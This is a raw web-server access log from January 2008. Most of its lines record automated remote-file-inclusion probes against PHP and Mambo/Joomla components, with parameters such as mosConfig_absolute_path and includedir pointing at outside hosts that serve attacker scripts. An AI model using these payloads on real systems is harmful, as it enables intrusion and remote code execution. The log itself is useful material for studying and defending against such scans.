216.129.193.100 - - [23/Jan/2008:09:19:39 -0800] "GET /logs//vwar/convert/mvcw.php?step=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
216.129.193.100 - - [23/Jan/2008:09:19:39 -0800] "GET //vwar/convert/mvcw.php?step=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
216.129.193.100 - - [23/Jan/2008:09:19:42 -0800] "GET //vwar/convert/mvcw.php?step=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
216.129.193.100 - - [23/Jan/2008:09:19:42 -0800] "GET /logs//vwar/convert/mvcw.php?step=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
74.6.19.110 - - [23/Jan/2008:09:20:30 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.107 - - [23/Jan/2008:09:20:30 -0800] "GET /logs/access.log HTTP/1.0" 200 100974 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.208.138 - - [23/Jan/2008:09:23:15 -0800] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iasct.jp/image/djd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.208.138 - - [23/Jan/2008:09:23:15 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iasct.jp/image/djd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.208.138 - - [23/Jan/2008:09:23:15 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iasct.jp/image/djd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.208.138 - - [23/Jan/2008:09:23:16 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iasct.jp/image/djd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.208.138 - - [23/Jan/2008:09:23:31 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iasct.jp/image/djd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.230 - - [23/Jan/2008:09:29:27 -0800] "GET /backup2/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.208.138 - - [23/Jan/2008:09:32:13 -0800] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iasct.jp/image/djd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.208.138 - - [23/Jan/2008:09:32:13 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iasct.jp/image/djd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.208.138 - - [23/Jan/2008:09:32:13 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iasct.jp/image/djd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:09:33:51 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:09:33:52 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:09:33:52 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.28.106.195 - - [23/Jan/2008:09:34:18 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [23/Jan/2008:09:34:21 -0800] "GET //skin/zero_vote/error.php?dir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [23/Jan/2008:09:34:23 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:34:38 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:34:38 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:34:38 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:34:55 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:34:56 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:35:01 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:38:03 -0800] "GET /logs/access_080106.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:38:08 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:38:21 -0800] "GET /logs/access_080106.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
70.84.49.42 - - [23/Jan/2008:09:39:09 -0800] "GET /logs/access_071229.log//index.php*=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.49.42 - - [23/Jan/2008:09:39:09 -0800] "GET //index.php*=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.49.42 - - [23/Jan/2008:09:39:09 -0800] "GET /logs//index.php*=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.234.106.5 - - [23/Jan/2008:09:39:25 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.234.106.5 - - [23/Jan/2008:09:39:25 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.63" "www.dmulk.com"
211.234.106.5 - - [23/Jan/2008:09:39:26 -0800] "GET /logs//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 31402 "-" "libwww-perl/5.63" "www.dmulk.com"
211.234.106.5 - - [23/Jan/2008:09:40:23 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.63" "www.dmulk.com"
74.52.208.138 - - [23/Jan/2008:09:40:23 -0800] "GET /logs/access_080106.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iasct.jp/image/djd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:40:43 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:40:43 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:40:43 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:40:44 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:40:45 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:40:50 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:42:01 -0800] "GET /logs/access_080106.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:42:01 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:42:01 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:42:28 -0800] "GET /logs/access_080106.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:42:28 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.249.70.19 - - [23/Jan/2008:09:42:29 -0800] "GET /megumi/earrings/ HTTP/1.1" 200 2081 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:42:38 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
68.8.232.250 - warboard [23/Jan/2008:09:43:29 -0800] "GET /warboard/index.php?function=show_insert_form&table_name=warboard_main HTTP/1.1" 200 7348 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
208.78.173.10 - - [23/Jan/2008:09:43:40 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.78.173.10 - - [23/Jan/2008:09:43:40 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.78.173.10 - - [23/Jan/2008:09:43:41 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:44:52 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
201.28.106.195 - - [23/Jan/2008:09:45:24 -0800] "GET /logs/access_071224.log//com_swmenupro/ImageManager/Classes/ImageManager.php=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [23/Jan/2008:09:45:24 -0800] "GET //com_swmenupro/ImageManager/Classes/ImageManager.php=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.148.17 - - [23/Jan/2008:09:45:25 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
201.28.106.195 - - [23/Jan/2008:09:45:25 -0800] "GET /logs//com_swmenupro/ImageManager/Classes/ImageManager.php=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.8.232.250 - warboard [23/Jan/2008:09:46:47 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=insert HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?function=show_insert_form&table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [23/Jan/2008:09:46:48 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&just_inserted=1&order=dataid&order_type=desc HTTP/1.1" 200 33145 "http://www.dmulk.com/warboard/index.php?function=show_insert_form&table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:09:49:27 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:09:49:27 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.8.232.250 - warboard [23/Jan/2008:09:50:12 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=583 HTTP/1.1" 200 7631 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&just_inserted=1&order=dataid&order_type=desc" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [23/Jan/2008:09:50:51 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=583 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=583" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [23/Jan/2008:09:50:51 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=583&just_updated=1 HTTP/1.1" 200 7667 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=583" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [23/Jan/2008:09:50:54 -0800] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=583&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:50:54 -0800] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:50:55 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:50:55 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.8.232.250 - warboard [23/Jan/2008:09:50:56 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [23/Jan/2008:09:50:57 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33151 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
201.28.106.195 - - [23/Jan/2008:09:51:15 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.106.5 - - [23/Jan/2008:09:51:54 -0800] "GET /logs/access_080106.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:09:51:56 -0800] "GET /logs/access.log/inurl:http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:09:51:56 -0800] "GET /inurl:http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:09:51:56 -0800] "GET /logs/inurl:http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [23/Jan/2008:09:52:09 -0800] "GET /logs/access_071224.log/inurl:http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.82.199.252 - - [23/Jan/2008:09:52:21 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.modem56.info/modules/postguestbook/styles/internal/header.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
81.82.199.252 - - [23/Jan/2008:09:52:21 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.modem56.info/modules/postguestbook/styles/internal/header.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:52:55 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:13 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:13 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:14 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:15 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:47 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:47 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:47 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:47 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:47 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:09:54:52 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.129.193.100 - - [23/Jan/2008:09:55:24 -0800] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
216.129.193.100 - - [23/Jan/2008:09:55:24 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
213.133.108.134 - - [23/Jan/2008:09:56:12 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.133.108.134 - - [23/Jan/2008:09:56:13 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.133.108.134 - - [23/Jan/2008:09:56:13 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
